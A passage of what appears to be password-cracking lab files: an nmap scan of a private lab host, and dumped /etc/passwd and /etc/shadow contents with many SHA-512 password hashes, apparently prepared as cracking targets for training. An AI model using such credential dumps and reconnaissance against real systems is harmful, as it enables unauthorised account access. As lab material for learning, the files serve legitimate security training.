nathan:$6$t1nr6qNz$GdaeXW3DynadN54N9.XGO3F1VN0kWgxfnE7i/KaPM9Rv2FVEfZaJDNMqqrcrxtHjtxH8dHMIgnIviAlXejZI0.:1078:1078::/home/nathan:/bin/sh karl:$6$2SjYTDHQ$or6fqbKAyWYmzj7yqQov/KWIeti459Y83WCgh3hp11cQdRhzLIyOjUo1tFn/vtZpWDb6Sc94T2CL5MgMcgb0Z/:1079:1079::/home/karl:/bin/sh jose:$6$q0dfDsFf$md83VAivCKQ0mKAt3iUhX5XyX2.mif0bdDm3qd/uu6pGPlFFdpHXiFiPrU3A5QfnksdVA.yMF2kqqARuBybmH/:1080:1080::/home/jose:/bin/sh feedback:$6$oxHD8GmD$kGMV8tRl31iptNlU3kLM7Z9vrqSTqosZtjHseV.bFuRhrD9ZYUjxgYabUL2CaQYq6kChznrdyg1hk.L9om0eQ1:1081:1081::/home/feedback:/bin/sh dev:$6$MDKxgwuE$vnvMEnKF/CwtqC60XEdqQO07UTrIVV0IxNoaMl3uGQy37Gh9Dl5jbg0bbAOBon2Uslmzy28AcyO7xJafdd5iw0:1082:1082::/home/dev:/bin/sh bryan:$6$ZFlofYYU$aWT3Ig1t7xYYrkIdZb..EUaYUrwGzLSVaKhy5IJtvFTQAKUi4xf8Ek8IU2KQf6Hj9YJBY7fpuSKW052ct/qmI.:1083:1083::/home/bryan:/bin/sh bruce:$6$bKYubhwp$8VamLKD7r3OWbnqn79l3HsuBf5X8YAR2cq6s5.Tparz2GK2dGThKQTchJ3ZHTmCV7VsJdZzqXRHiknQU2gaDf0:1084:1084::/home/bruce:/bin/sh qmailr:$6$ewnv7baU$vgPT5H27mTC1LPskTQlmkWug1puAoIeEpWhWY65.PDOIXk09unASmKIpgYCTGIGUpXyg6Y04Sswqo2shldi30/:1085:1085::/home/qmailr:/bin/sh jamie:$6$hKrwJ2XL$K.VjPjTb0deFuo3YIhvypxHN9Wn952X2rIbhJ.t.5Gk9uO1vqt3NH5HEw2uPwPGMYSpuM4GzfXLEO9PKO2ZM//:1086:1086::/home/jamie:/bin/sh derek:$6$VRU46VG/$21FGTv71yuYyQ/7AtIzIqjV3GdHivvx7abiNlqe/QMffvF4NNAGRJ0cDL2eyWM2vPfIZZtcpn8P6XrcqqblYP/:1087:1087::/home/derek:/bin/sh brandon:$6$OsORtNZ.$1Jr.wOnm6EonOFjMu7utgFiv5VT.K2Fbt0JehTIevXHom.if0w3QBWeMvXJ0BZHeA8TleiCkcozae1KOBlbHX.:1088:1088::/home/brandon:/bin/sh risks:$6$SoZjQEuS$Nxo6bfcqQGXW7Sj40Y/7OuG4KgKMzWROATWrJ6EfO9wk0FTqQXMv2Rx6Eml3p7i7s7YM/9S6wwA8hUtcQ9sRY0:1089:1089::/home/risks:/bin/sh proberts:$6$ft8ebMmB$pZgSxqCWt9CxaAM7KrD9PTVJRVGFeAsm9mkWavvOYlErmnmYuo/qFYSLZ.jfgbfHEwq//nz67TK4MHRm6NemL0:1090:1090::/home/proberts:/bin/sh pierre:$6$jhaog97C$XVbyU2iMF0Fj8qMg0.PryFkhVctz50UTCzmtSvgYIJKtEzvfJ5XQ.V5aiGph2IjMOaUhSL1eDO8.sYSQDydGZ/:1091:1091::/home/pierre:/bin/sh pgo:$6$msJLJFAW$3yLybUn97UyvcxoV77JCoRS9IVcgPb5lMYNPgc2.bQKBrZvT3Qw48GroMnA.VPPdQlGHRKRL70bYDWa8HWJOX1:1092:1092::/home/pgo:/bin/sh maxim:$6$v4qWXFNW$xvrxBZ8gfF7fsbGJ3V94dew9bajgsxI62Ew0jM0GK/EGRVQmT6sNpEbcYzVuSK8U6ziH7R7pqWwC9Uja7eF5X0:1093:1093::/home/maxim:/bin/sh guest:$6$6vAGLPss$5Ciwdq3qSTSTfgtrqZ.cY9SI5AtZwHN/MBqIEIhCOJcmXKDik7Je47JvyjeAng01AcfsjEMatE4tzusDIcEwU0:1094:1094::/home/guest:/bin/sh ================================================ FILE: ine-labs/bruteforce-and-password-cracking/nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Sun Feb 21 14:10:57 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt Nmap scan report for 192.168.99.22 Host is up (0.055s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0) 23/tcp open telnet Linux telnetd Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap scan report for 192.168.99.100 Host is up (0.00018s latency). All 1000 scanned ports on 192.168.99.100 are closed Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Feb 21 14:11:07 2021 -- 2 IP addresses (2 hosts up) scanned in 9.88 seconds ================================================ FILE: ine-labs/bruteforce-and-password-cracking/passwd ================================================ root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:102:104:MySQL Server,,,:/nonexistent:/bin/false telnetd:x:103:106::/nonexistent:/bin/false sysadmin:x:1000:1000::/home/sysadmin:/bin/sh info:x:1001:1001::/home/info:/bin/sh support:x:1002:1002::/home/support:/bin/sh abuse:x:1003:1003::/home/abuse:/bin/sh admin:x:1004:1004::/home/admin:/bin/sh postmaster:x:1005:1005::/home/postmaster:/bin/sh chris:x:1006:1006::/home/chris:/bin/sh webmaster:x:1007:1007::/home/webmaster:/bin/sh mike:x:1008:1008::/home/mike:/bin/sh steve:x:1009:1009::/home/steve:/bin/sh dave:x:1010:1010::/home/dave:/bin/sh paul:x:1011:1011::/home/paul:/bin/sh peter:x:1012:1012::/home/peter:/bin/sh matt:x:1013:1013::/home/matt:/bin/sh jobs:x:1014:1014::/home/jobs:/bin/sh joe:x:1015:1015::/home/joe:/bin/sh user:x:1016:1016::/home/user:/bin/sh eric:x:1017:1017::/home/eric:/bin/sh dan:x:1018:1018::/home/dan:/bin/sh brian:x:1019:1019::/home/brian:/bin/sh michael:x:1020:1020::/home/michael:/bin/sh sales:x:1021:1021::/home/sales:/bin/sh nanog:x:1022:1022::/home/nanog:/bin/sh jeff:x:1023:1023::/home/jeff:/bin/sh alex:x:1024:1024::/home/alex:/bin/sh scott:x:1025:1025::/home/scott:/bin/sh jason:x:1026:1026::/home/jason:/bin/sh bob:x:1027:1027::/home/bob:/bin/sh jim:x:1028:1028::/home/jim:/bin/sh adam:x:1029:1029::/home/adam:/bin/sh james:x:1030:1030::/home/james:/bin/sh tim:x:1031:1031::/home/tim:/bin/sh majordomo:x:1032:1032::/home/majordomo:/bin/sh daniel:x:1033:1033::/home/daniel:/bin/sh ben:x:1034:1034::/home/ben:/bin/sh hostmaster:x:1035:1035::/home/hostmaster:/bin/sh tom:x:1036:1036::/home/tom:/bin/sh snort:x:1037:1037::/home/snort:/bin/sh andy:x:1038:1038::/home/andy:/bin/sh andrew:x:1039:1039::/home/andrew:/bin/sh greg:x:1040:1040::/home/greg:/bin/sh robert:x:1041:1041::/home/robert:/bin/sh martin:x:1042:1042::/home/martin:/bin/sh rob:x:1043:1043::/home/rob:/bin/sh stefan:x:1044:1044::/home/stefan:/bin/sh sam:x:1045:1045::/home/sam:/bin/sh linux-kernel:x:1046:1046::/home/linux-kernel:/bin/sh jonathan:x:1047:1047::/home/jonathan:/bin/sh erik:x:1048:1048::/home/erik:/bin/sh orion:x:1049:1049::/home/orion:/bin/sh doug:x:1050:1050::/home/doug:/bin/sh spam:x:1051:1051::/home/spam:/bin/sh nessus:x:1052:1052::/home/nessus:/bin/sh bugs:x:1053:1053::/home/bugs:/bin/sh rick:x:1054:1054::/home/rick:/bin/sh josh:x:1055:1055::/home/josh:/bin/sh research:x:1056:1056::/home/research:/bin/sh craig:x:1057:1057::/home/craig:/bin/sh sven:x:1058:1058::/home/sven:/bin/sh gary:x:1059:1059::/home/gary:/bin/sh brett:x:1060:1060::/home/brett:/bin/sh Security:x:1061:1061::/home/Security:/bin/sh torvalds:x:1062:1062::/home/torvalds:/bin/sh nate:x:1063:1063::/home/nate:/bin/sh larry:x:1064:1064::/home/larry:/bin/sh adrian:x:1065:1065::/home/adrian:/bin/sh test:x:1066:1066::/home/test:/bin/sh tech:x:1067:1067::/home/tech:/bin/sh someone:x:1068:1068::/home/someone:/bin/sh kris:x:1069:1069::/home/kris:/bin/sh andreas:x:1070:1070::/home/andreas:/bin/sh akpm:x:1071:1071::/home/akpm:/bin/sh stephen:x:1072:1072::/home/stephen:/bin/sh password:x:1073:1073::/home/password:/bin/sh oliver:x:1074:1074::/home/oliver:/bin/sh blaisorblade:x:1075:1075::/home/blaisorblade:/bin/sh roman:x:1076:1076::/home/roman:/bin/sh postfix:x:1077:1077::/home/postfix:/bin/sh nathan:x:1078:1078::/home/nathan:/bin/sh karl:x:1079:1079::/home/karl:/bin/sh jose:x:1080:1080::/home/jose:/bin/sh feedback:x:1081:1081::/home/feedback:/bin/sh dev:x:1082:1082::/home/dev:/bin/sh bryan:x:1083:1083::/home/bryan:/bin/sh bruce:x:1084:1084::/home/bruce:/bin/sh qmailr:x:1085:1085::/home/qmailr:/bin/sh jamie:x:1086:1086::/home/jamie:/bin/sh derek:x:1087:1087::/home/derek:/bin/sh brandon:x:1088:1088::/home/brandon:/bin/sh risks:x:1089:1089::/home/risks:/bin/sh proberts:x:1090:1090::/home/proberts:/bin/sh pierre:x:1091:1091::/home/pierre:/bin/sh pgo:x:1092:1092::/home/pgo:/bin/sh maxim:x:1093:1093::/home/maxim:/bin/sh guest:x:1094:1094::/home/guest:/bin/sh ================================================ FILE: ine-labs/bruteforce-and-password-cracking/shadow ================================================ root:$6$NMfSi/bG$y9j8uMu4glpLudMRvzznUZ5h30jlobtAJGZYRaa64pdKy3i1WLTnmPPWUxfPdZwJKReFPU/zBo8HRpD.RAkrG1:16475:0:99999:7::: daemon:*:16315:0:99999:7::: bin:*:16315:0:99999:7::: sys:*:16315:0:99999:7::: sync:*:16315:0:99999:7::: games:*:16315:0:99999:7::: man:*:16315:0:99999:7::: lp:*:16315:0:99999:7::: mail:$6$jLhDRY5M$MJPM2mmM1khh8l0taxORP7oNn4jmwHAOLWZij5DacV25Hzj1ryykobxGlprlgaCXg/PGV2Po34JF4HgPv8roQ.:16470:0:99999:7::: news:$6$7pnXYnUf$F7t6t4A6rQf2z/ycnPuEdzMH9RGB5W0OFL420eKvp/s/SK3KaD6EM/gDNzhL9YFCthi7JVavBa8/nJCxX3XZW0:16470:0:99999:7::: uucp:*:16315:0:99999:7::: proxy:*:16315:0:99999:7::: www-data:*:16315:0:99999:7::: backup:*:16315:0:99999:7::: list:*:16315:0:99999:7::: irc:*:16315:0:99999:7::: gnats:*:16315:0:99999:7::: nobody:$6$KRss6ftU$c/nB9QsK0iZ0zj8o6VmArcgiuGZ4oOjlLeCDYioV/rrcYYtuE/xkvhdDYvRtlydkFjvlqOXdKDV/0o6fA32Qt.:16470:0:99999:7::: libuuid:!:16315:0:99999:7::: sshd:*:16315:0:99999:7::: mysql:!:16315:0:99999:7::: telnetd:*:16391:0:99999:7::: sysadmin:$6$Sje/FZov$s6OBgDRso6O25TAo/K62bmuUjGI7po0yaa5y7n4agBKIFywDyleLs2FFNlXJiAgROHN4VD/WkfEFYIXcH9QPW1:16475:0:99999:7::: info:$6$b7FyMcC/$Xq.S9rAti5XfKvNR8DK2U0hCusjKeqNBGxrm0W9OvfA29gg68kKRkTyut6rLIf0ib4rLilPg6uiSqCUOuoYFU.:16470:0:99999:7::: support:$6$5UCqb4PI$080lZhjRESgv4pvv3eYze/PQFkEzIe//QBAgX4383cxPfX4B7hwsPP5d.vEOp49Nep015ISQCkD1SV.b.CeV0.:16470:0:99999:7::: abuse:$6$wew6XAFC$bRWpMBzLUx9vps5kW8zBJlHh7y7TodfdNfClkmlTEIcs31q9TQR1nPnGYp4GO4fpcOTs/H8Ui62lFoywXMjSs.:16470:0:99999:7::: admin:$6$u145Czfw$8UNRyCdVRM5BpO6wMZBOhJJA4tXLexxwQJhGLbJbD0FUOBWg.V/ybl6BNQVr4er3Gghg8gymvUqu1fMWqLs3V.:16470:0:99999:7::: postmaster:$6$TNSdQqc8$Pij0H4TXEH6.i2tpomznu0uY9UFss/wG6xs1qsYQQSJ0YZNB/dBDkmq9I3O1regCsFgS9r7jSGq0GG7eIcqtK1:16470:0:99999:7::: chris:$6$ZAY5sjcZ$htURsPqIyO4tpNUq12v2GDgAXe4oGVLYPQHDpVn7TMgLm8MP7g5hpZo5NitjHQfqvzB0dptX.fR0ciN6kkWeA/:16470:0:99999:7::: webmaster:$6$KLM4wfkU$ZYsO.eQu2qXMfpQaSLzjgJn0dBfyiPRrb4xKT8cUWbaVI.psHzgPuWpkXiwKKWrqfSVCceQBuDVwFNQwH6qWS1:16470:0:99999:7::: mike:$6$HZRL7RJz$PanyrCDQAvupUzoQ/SjtY1pp4DHQE4p7sVfvh6oZNbAlgUQBIf9R6TMW3wNV4976ngBUhp.39ZKbPwMYf2vsU1:16470:0:99999:7::: steve:$6$gDpnLZEp$fd9Cptcb9W2lIYMIP/YTgmT4t2syNr99LWNmdemNdhKOpAQ3KnHMR6/BRtwyKJw2ASYWlM612anHKhT7DEua31:16470:0:99999:7::: dave:$6$ye9cmjcs$WwHt5jEfmA3ONfKpD8YjLu2bReTpNoDByFdvfYCHD81609nrgkXEq8iV12LundO8a5oUW9h3HN4m0GYLKHM4W.:16470:0:99999:7::: paul:$6$dJKby9gL$YOeP.Ct6VQjxDDptfdvsTjgZEuvoIzhKua8lbn9G/BAQZ5zxNMSaeTAvQYF4Tk3MR6VVmAKrEx86LC2pXmJ4o/:16470:0:99999:7::: peter:$6$vMrS1QqI$rY7HpdXf1T2YRXcryJf7ubn98vsPD5aNduivE3biK.ExHmO1bjhn3UlW4wX2B9PPUTiNY49N88jZGKXUr/Yu3.:16470:0:99999:7::: matt:$6$WPIf46Nd$/xQQomUKt1rkbWVDMfqJsvPQStDthciv8OwXgPQyTos8Yz3YTlP8WTwWPKyWauiYP6/EiBtAW3LhaBXo3LTXQ.:16470:0:99999:7::: jobs:$6$fVNXa4IX$9CCRbwgJpfmQTUCTEBb9tqI0ze1vkSbMUUOusWxnH709pyzTCWdRTBtzViTuECSJBwxZhDwwjZdl7f7rtiAYg.:16470:0:99999:7::: joe:$6$xD.dth1G$g5u/t/SnuBZCprxXo9CogU5AXcaEtWglhu0nzxZzJTimkobFgI97xCR0p66REWXfWDZ.z95SeWoGPswT0j8wU1:16470:0:99999:7::: user:$6$nytxqfYV$.ysNgYy5wAqynOjSAt8j7wKqDVwMjhhMI/5NQZohVKtwtZjtoSHSgxhT3MkGUvP5O0INCRZihD34Dz0wB2KCQ/:16470:0:99999:7::: eric:$6$VuEU0lI9$VCX/Tg6mxXY7wHHoCGQmw8syH39n6wrmUVgChfTd6I0Yt7Un7SFukxR0hhC2NHl6T7Fumr8hVwvML5DMF.Ua./:16470:0:99999:7::: dan:$6$zVKkCXse$o07lxPMPnWaHQfbj6s/D23pJNzhLsKi1WGGlsVifSIXdYdQ0pCbl0Rjn/JV83HI4f0lDjBGWLv92gSeBdqCzZ/:16470:0:99999:7::: brian:$6$o1kRvK4f$6kx2GgKATEjqgF/Ne5H3EEGBUMz/2zZwVv3kTCr7wnxqN7eKkkBATmz9Ye3C6QW/MQRW.9F6MHSGvJKnA4uFG1:16470:0:99999:7::: michael:$6$1yCWFuPq$OiVnd4GHG/8bMLzLyWVpV47WAf7r9LYzTfGLSKI02.Ubq8YK/QsSi7EuXRM7cPC5IH9HpSkYWJQBbOUZQQHYt.:16470:0:99999:7::: sales:$6$PsA1.Gfk$zowvm.gcO7raMNmAJ8fDLjKybTUanVmVNld/k5S7gMrwq43Q1jO2MQ/dGhNQTsCNrC2.Vwjt3/D3JKKNHJbX/.:16470:0:99999:7::: nanog:$6$FDvdWcSH$F9T5azU4LovIyNB7wX0htrH74TJ46iHmn3QjI8lgQEKVQDeQ6Kd1skimbuTbE7.L7bl9xO7j/GpdiQp2m4c9d.:16470:0:99999:7::: jeff:$6$6hWz2ZU6$xcj.w/GvzUWwqmpE5CVAX8pWrW/92yi/13BKzu31oH80P7KJ2kKr8rpRgMkjuIO3GjHdGg1qmYxkvNcwubsMC/:16470:0:99999:7::: alex:$6$JyMZO.bE$h0b.97PuMtRnim8GRTiWbqxNIvLeiQ12dBTDyufyaClGhIRHnSaNQVdqFMSDY5f.qpGrk0rTxHQ8Ba8zMdk5I.:16470:0:99999:7::: scott:$6$LawsHaww$YJJd3lCsV45nty1gHPUp2PIwC9ezfZ8R7s4X4cq16XeiNg34aD.ydJZxG09Gfbv4HhH.BUeCDe.Zg4KDxvccV/:16470:0:99999:7::: jason:$6$fvuvc5Jr$Rtbo0pfPs4sgCreQSOKdOy2Xes8ZpGaWpRzau/zT0Fe2PfY895x9FGZUT9OlTJvRH73wuLI1DzkqVq46M8MCo.:16470:0:99999:7::: bob:$6$O9g8kRFd$n4qyO7Pn0e0q8.JPhoszE9CT06lheE4PcMaHhB.VXQeWlsAKWoSHaOlI8QDBb0Tx9wKuuyTKsbTE7w6Znw2Uy/:16470:0:99999:7::: jim:$6$RoQAB6qb$J6ku0OnN9AW/rlGDogQC0a8mHlM5SEpLJTvpRRYr1ozJ.1tpa14MW/txPzxJM0aDehqIskDrPgeu2GNAQriVx1:16470:0:99999:7::: adam:$6$SMfCr27F$ZsSxV5bja0friZIyeaVwKhOta1Kde4X8Lk6HrqCWPA1Nm7TpvsoLZh1qHz/tPJSp6l/LzDIn7lOkGBC4HuD6E.:16470:0:99999:7::: james:$6$qEJW3BIW$c8Zo6o0MABzuSLQu5Db6wFZAkNliAVC/VM4NHVu5Sd2mUb.xBIUbuvQLWbbXf6KPgtNhuzPdGrey45LtRYVSP1:16470:0:99999:7::: tim:$6$JXamlohb$Az7LB/X.bm7J4QU//XHE9W.OGZ87wi2RVRHAWrSYxX75lrZn7vkwSGxBp/pZEZLGUJhnzE86lkIb.VPkst2Ql/:16470:0:99999:7::: majordomo:$6$NPJJ2uUo$ct2R6b.jg.WK4dAw2wzdDgxsuHg5LUpdvz9owz.CgAb6L5o/IKsOZj6rbmaWyolhanoOxKrdsmn4.Bysh0hGo/:16470:0:99999:7::: daniel:$6$8mksQQtb$xXcaS/KPANmdotnWrHa26J4KUaQHBQSxy5FvniWecSyIpvZtZrm9ZMCG/x0WKXzo0NOHwS6yoKYUoRwB4BDwh1:16470:0:99999:7::: ben:$6$2iH7dNAN$zgpUqA9ZXBRRDkJuv1TrAulRGQplR5t98Gx9js77s6quNEtU/hXZLHKryYZtDZO8MJjO.ZUzs8k9QpKrRBGX51:16470:0:99999:7::: hostmaster:$6$V5c3cv9Q$S0JMkvGW7qokXYf0lEGAw8kY29s1VKKcSz16N2fvbJHML5BZR6vZofyTGUMNGVJ1k.RNjHYdmOqdId0Ep0wO61:16470:0:99999:7::: tom:$6$JWml6IwT$UbW187dhuYbtw983jO9EqT/m6qYzT/Ovvw9lcIpBsL./g7r6SJTDFsupsnNoavyfQ3FE2tq0tr4byVdsvxxu40:16470:0:99999:7::: snort:$6$O/joFTvS$zFDDPUYVY3qQq45i6FgZRFx9dQdTTkWoIKE2IsoBw5FrzZGoKiLS82FcMCCr0bouOD0cX/hYswDjKD7UNN4v/1:16470:0:99999:7::: andy:$6$vvz6/jIM$KpRwLWVb.JQZd9A/gAgmV/jdyXUr0FzU4CwOpzxVI7/7qd9pt6AFdSSMokJWL.WC7w0yFuITvyoE7iSyy4Ed6/:16470:0:99999:7::: andrew:$6$xrxK.ZMk$SbnalSKc8SRQUuZadGTGhClUF18xjC4HTWOPlcT2D5wgRkd.ou5zLE7dyM/bBI0M9vc6WYQjQJ7Teotmc3dJN/:16470:0:99999:7::: greg:$6$M6b5jpj3$1toGupgM1bdko05fLUrnUdDwwdB2nbK3pvpgpA.cK6dI8ZyBW0PnHX29mwK6qV4gGUZaGZGpUHCUZHQPXTW87.:16470:0:99999:7::: robert:$6$yfsl9IAe$5ZtjNOyf7uuOo4a.Q7G.96z67KB9BHI.9ri7zeqS6HFk4RjtePvXGdD5iZCK4EJUBsyjy8KYe0NsSEz4S1jZK0:16470:0:99999:7::: martin:$6$UMJrcI1d$ljAGjf2Ysu6WZj6OonyBqdWgC1JGBrg/cSkwA8P0AYuFUi2Nj3V8jTz77HSBCgNdBmi8Z0DpU40lkpJoKCVYi1:16470:0:99999:7::: rob:$6$KynzgNNI$CRqz5ZCoxyw8Iz3Y4DavYHefo8e3CdPxaJAKmA8G7fVioFb3imRVsOQO9fvR94aOSywrCHx8JRZ8rox4jqVCk.:16470:0:99999:7::: stefan:$6$5UNbMPFr$S9zKaPdjN3WF5XdvcBZrc1RV.bk/ufmZgiNAr8OsnKtZCPqFRtQ.g2ewAbQ40ARubCMQD0fIdQSL3LB4JBBuK1:16470:0:99999:7::: sam:$6$4IQ98NuP$Q7Kd1uQhbVl4rv9yPzn51rA8U1stcC9zCUu/o83v959HNcMXdEyZ39Ec8/cTq89v/fes.lwpozekSK16JHLr3/:16470:0:99999:7::: linux-kernel:$6$iZd1ERbp$wO5U7YmvpfM8vuJX2er3jI7JPUTv7ahoypgc2n1/CWQr9yyf7CyFcxUBj9T2tEx7KR9x3Z6/C5Q3wxumJKMuu/:16470:0:99999:7::: jonathan:$6$JN51qUeO$YRkPN8gR43gmtTEg0uycZaz3SOOwT37g17tt8bB/Fi/Xr/dKPsUhaWfOjZ1uNrJg7sL4z9srGe.zWP0B1tfQc/:16470:0:99999:7::: erik:$6$Ib9a2n66$vfEKmQ0LO/sV3M4PsanGWx3ATuHNFZ/FysOYhKAdG4PdXeXiLackGxLuNs7qG4KOAVVhyLAM.99pP4j8sJ3Vr1:16470:0:99999:7::: orion:$6$EnZP3LwQ$pDR2Jny9KIPDEmoB.jzhp38Ik5FyG4DWzewHoEePxdCBzFfBWnIUQNXDNup8U2IoAiUC/jaO/i9SpStI8ZgIa1:16470:0:99999:7::: doug:$6$kV2vj2S6$eKQyp76DlZbo/tgLKyjtLQf.G86BY9oVkfscbIrWwCYRqd.zJnLIOJPrGJJSvK59O.OpUc5L8vo.1yet/IndA.:16470:0:99999:7::: spam:$6$b4.yukui$byGJM8hTw11KmLes6YSfvo7IKfkg5HYtll.JOVFJgM9IObO6NE7dpLhTiHxgLLCPtXa0wbwxPAlYTtPsrCnLP.:16470:0:99999:7::: nessus:$6$5b.qaMaF$MSnDGsA6Yo7LzABXWXtdHb5HruaehdkrLbdv9Yg.lQoG9nC6patjwPqFuR1G2CSslqIZkBbZst7rhCeJXr3Z.0:16470:0:99999:7::: bugs:$6$cJfe9yB0$DkgkyIHYGOFQ9hIF6A28Da0niQBq6Yn9PXjNKAJEK7y0sdEc6v9KSpW8DEBXg.lO/MCgpHuuAbbcAQfYs36gG/:16470:0:99999:7::: rick:$6$SFXj7ADA$qu3mlQDjIwVNzC.3JkUKUS2Hp7aeC1Zg5GP1h7nM5BmCTsJ7d1ckSF3ErjPbpZFIqNCz6NAgy1F76PmjeJz.x0:16470:0:99999:7::: josh:$6$KU1UUsAZ$ac7T8xBfcLxXmb/qRNuEKrfZy1G/kcqsJzWJ93/qTa08itf31x5/pcdVHj30MKXYh/poaN8fOlKkZR0f2xrr3.:16470:0:99999:7::: research:$6$m0nQbAaZ$FKL3XBWkT3GEv0UVn6WTHssjyjou2/33f8BKE4voI7HWU9FdF1hABlyQAqAYhJOfRuQpuZzSBcJVvCMtMX6D51:16470:0:99999:7::: craig:$6$movXAzDc$E4sBocqFLzY9iif37.1VF4uuOr5QsI7ZwrnkTM.ITDebTuEc5od/87suR9fBPGuEm4HU4pUf324z3Pxb86Sk9/:16470:0:99999:7::: sven:$6$L2Ac90qT$4NWVht13koXx1Zewnoq.aqh7584NpDNToIa41Qqbc94hwitYtA5pXZF0ZwsKRUIQ4bf0Z.5Tm9Ue5BLbw1y/61:16470:0:99999:7::: gary:$6$mbC5nX5S$baJcUKoownjBSnz6/wuXNK75gvtKZ5dub4BZwpjP1YvgkjooQ8GRbZpR4fAo0zevFiGWONgHjDkLKYxDiYIST/:16470:0:99999:7::: brett:$6$qd2dCjHj$6qWUTOIG5OmP5OcN3.cMfDr24ScByDakPNIrRZjZqcqaiHlBuFbGvDsGTIAPizkZGrIvuH7gnhAgt/hg3f9Gz/:16470:0:99999:7::: Security:$6$GPayTWXW$sSarI38ETnIzRUSXgEXambmN8FNcCuUiDqnMYeeKYzavwk0Pefw5VafzCG9jpgTnzaWrY1QlbpkNOy4c22yRu.:16470:0:99999:7::: torvalds:$6$UdO6LNso$sIErGAh.8NWiPZyarP4EqM15zKLy8ZDT4C1HixADAOHJ8MojNHFAJa33jx9qpixPiUpgibhKJpKb4gY/YgjSx1:16470:0:99999:7::: nate:$6$cic0vUV.$/zZv9r8/5C8D7HkGlymqTr1t248kTvSScQfyxnYldFQPQplIbfrn2R61ZHu.t0ImjP38YyMzw1Wbftpg8p9Xf0:16470:0:99999:7::: larry:$6$C1wU6KtA$XgPBkqQLm6j2QdkDfLNyyQC90Fck6.EKAKxwD0DVeHm2m8k3.r4yLB0.lqa741PXTOYpq.gZPt83GsQszfK0G1:16470:0:99999:7::: adrian:$6$.wQ4ogUx$xRH9xkYVsVAKswluFPaNZj0c/CxVyzpdBkQaZ1rpSU8IEzub91YTwTDrEJUvWnCL9K.Sfm81/lQhLY1VpbX8g1:16470:0:99999:7::: test:$6$IKTyMZxA$C6g0kSQ7eWmmRQrB7jlFMvS4oPU48tE18sJKuPxX0QSl9QlOXwwY3U.2aTpalC3i6qcPbLSbjav0SjmlxplNp0:16470:0:99999:7::: tech:$6$OTt3okCG$lrKSF4KyxVZgWlJ3uGgBRmMkChdZ8hxHyPWXS2/a2Vlq129Zq3jCZVINrW9nRG20TNsqI0MN07e88jJTGVGjd1:16470:0:99999:7::: someone:$6$Zk8ylIKZ$rFllR3qlbmirrkgwRppG0HaV9ppHK0/jHWTVeqsX3oxFKjnzgg.DnS7CMXas151xCk51CmUV4dmeL17cJ3nIZ0:16470:0:99999:7::: kris:$6$MIsyuc0b$PcN7IMMSL7Fjla0C7IayevAuLD6iQmkvGX2rIxcx0VAGr7LACwtchRrE3AcZO5yTr3MQlZac9q2tvJcQjAUiF0:16470:0:99999:7::: andreas:$6$rsAbNhaA$CAbbNGghKugILQ6glWV0tEzeVbhoMB3S92Y155EHMaGeZsi6TpCIDVjw8aWlmWGIQAdB28OLQMKgWbYEAEz8x1:16470:0:99999:7::: akpm:$6$00w49s/D$wpRXPoKKRN4rNp11hIPCJ0v/C6BPpI.GZeihVlSfpvVd0s0zqglwb.blyf.hLsgrIbKwDI1s0Yvk6.FmArahS/:16470:0:99999:7::: stephen:$6$ssSU27er$LdCIfDEwxxrPHZLILJoBz3Zg.wWEaVgUfxf7pd8TQXtF4d1nOtIkUav2TMY1xrbyhCutzShgIkQTeopPCwlRg/:16470:0:99999:7::: password:$6$hy0ECcK6$FdtsdPMLymN9GYJFaWsCq16yyMY05Whd41qODKrWpSmwR1QiiOPcUtLutMJtpWkDv/AqUivlU2NChCrUZMini0:16470:0:99999:7::: oliver:$6$Iv.78Pvl$x4i0h9HyFfRo5mLan7JhSIS.5Yn7W5shQQpqHMC5ToXdUTWrUYDjgIZ1DtwTU4YRUh9O6QeR84k.i.4NSfX.51:16470:0:99999:7::: blaisorblade:$6$fI69BmWc$wrckcetwa5aKTbP0QZU7mJ3QD2yATRzag31BaCYUE0c/ESYNf1ivKrD/VsDY3D/PuIs1pup.VYm8OkwDnrUd6.:16470:0:99999:7::: roman:$6$pyat9UWx$t1ZZZGJ56DMNfl9IIWmT4DNeAQ1/RngqhGS232FytUAEtLn.duPbCoykRkfUiP2XrpV3V8Qh7wejTDsqyrXFq.:16470:0:99999:7::: postfix:$6$rMJQQZvk$EsTIxQbNZAgsETizbhaK/JUX0SAvWdXuVi0lNH1qI3kFy98e08XpH1c2fEOlCIlekhyymCiDVTP03Y/fo46pa.:16470:0:99999:7::: nathan:$6$t1nr6qNz$GdaeXW3DynadN54N9.XGO3F1VN0kWgxfnE7i/KaPM9Rv2FVEfZaJDNMqqrcrxtHjtxH8dHMIgnIviAlXejZI0.:16470:0:99999:7::: karl:$6$2SjYTDHQ$or6fqbKAyWYmzj7yqQov/KWIeti459Y83WCgh3hp11cQdRhzLIyOjUo1tFn/vtZpWDb6Sc94T2CL5MgMcgb0Z/:16470:0:99999:7::: jose:$6$q0dfDsFf$md83VAivCKQ0mKAt3iUhX5XyX2.mif0bdDm3qd/uu6pGPlFFdpHXiFiPrU3A5QfnksdVA.yMF2kqqARuBybmH/:16470:0:99999:7::: 